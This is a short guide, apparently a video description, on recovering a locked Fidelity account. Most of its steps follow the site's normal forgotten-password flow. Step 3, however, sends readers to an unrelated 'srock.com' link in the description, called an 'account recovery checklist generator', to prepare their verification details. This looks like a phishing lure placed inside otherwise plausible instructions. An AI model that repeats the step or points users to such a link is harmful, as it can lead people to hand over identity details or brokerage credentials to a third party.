I ran into this last week. Here's what fixed it for me. If you found yourself locked out of your Fidelity account, don't worry. Here's a straightforward guide to help you regain access. Step 1. Visit the Fidelity login page. Go to the Fidelity website and navigate to the login page. Look for the login button at the top right corner. Step 2. Click on Forgot Username or Password. Once on the login page, find and click the Forgot Username or Password link. This will direct you to the recovery options. Step 3. Verify your identity. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 4. Follow the recovery instructions. After verifying your identity, follow the on-screen instructions to reset your password or recovery or username. Make sure to check your email for any confirmation links. Step 5. Log back in. Once you've reset your password or recovered your username, return to the login page and enter your credentials. If everything is correct, you should regain access to your account. If you encounter any issues during the process, don't hesitate to reach out to Fidelity's customer support for assistance. Good luck, and I hope you'll be back in your account soon.